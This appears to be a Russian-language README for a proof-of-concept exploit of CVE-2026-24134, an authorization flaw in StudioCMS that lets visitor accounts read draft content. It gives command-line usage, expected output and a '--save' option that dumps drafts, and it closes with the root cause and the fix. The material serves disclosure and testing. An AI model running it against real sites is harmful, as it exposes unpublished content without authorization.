
Эксплойт proof-of-concept для CVE-2026-24134, уязвимости нарушения авторизации на уровне объектов (BOLA) в StudioCMS, демонстрирующий несанкционированный доступ к черновикам контента.
Этот репозиторий содержит Proof of Concept (PoC) для CVE-2026-24134 — уязвимости Broken Object Level Authorization (BOLA) в StudioCMS.
cve_2026_24134_poc.py — скрипт эксплуатации на Pythonpip install requests colorama
# Базовое использование
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# Сохранение вывода в файл
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url — базовый URL целевой StudioCMS--uuid — UUID целевого черновика контента--username — имя пользователя для аутентификации--password — пароль для аутентификации--auto-test — включить автоматизированное тестирование--visitor-user — имя пользователя учётной записи посетителя--visitor-pass — пароль учётной записи посетителя--editor-user — имя пользователя учётной записи редактора--editor-pass — пароль учётной записи редактора--save — сохранить содержимое ответа в файл--no-ssl-verify — отключить проверку SSL-сертификатаpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
Ожидаемый вывод при наличии уязвимости:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
Ожидаемый вывод при наличии исправления:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
Это сохранит полное содержимое черновика в draft_{uuid}.html.
[+] — успешная операция (зелёный)[*] — информационное сообщение (синий)[!] — предупреждение (жёлтый)[-] — ошибка (красный)Если вы используете уязвимую версию StudioCMS, немедленно обновитесь до исправленной версии.
Настоящая проблема: Проверки авторизации выполнялись на стороне клиента (JavaScript), а не на стороне сервера.
По словам команды разработчиков:
"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."
Исправление: Перенести авторизацию с клиента на сервер.
Ключевой принцип: Никогда не доверяйте клиенту. Безопасность на стороне клиента = улучшение UX. Безопасность на стороне сервера = реальная защита.
ВАЖНО: Этот инструмент предоставляется исключительно для образовательных целей и санкционированного тестирования безопасности.
По вопросам об этом PoC или уязвимости:
Этот PoC выпущен в образовательных целях. Используйте ответственно и этично.